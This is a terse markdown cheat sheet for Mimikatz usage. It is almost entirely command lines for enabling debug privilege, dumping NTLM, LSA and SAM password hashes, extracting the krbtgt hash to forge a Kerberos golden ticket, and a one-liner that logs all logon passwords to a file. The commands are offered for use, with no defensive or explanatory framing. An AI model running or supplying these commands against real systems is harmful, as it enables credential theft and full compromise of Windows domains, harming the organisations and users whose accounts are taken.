# Mimikatz Usage * Check your privilege, boy ```sh $ privilege::debug ``` ## Dump hashes * NTLM ```sh $ lsadump::lsa /patch ``` ## Dump Local Password hashes ```sh token::elevate ``` ```sh lsadump::sam ``` ## Golden ticket * Dump krbtgt hashes and create a ticket, ticket is saved as ticket.kirbi ```sh $ lsadump::lsa /inject /name:krbtgt $ kerberos::golden /user: /domain: /sid: /krbtgt: /id: ``` * use the golden ticket, open a new elevated prompt ```sh misc::cmd ``` ## Oneliner * Get the stuff ```sh .\mimikatz "log host-42.log" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" exit ```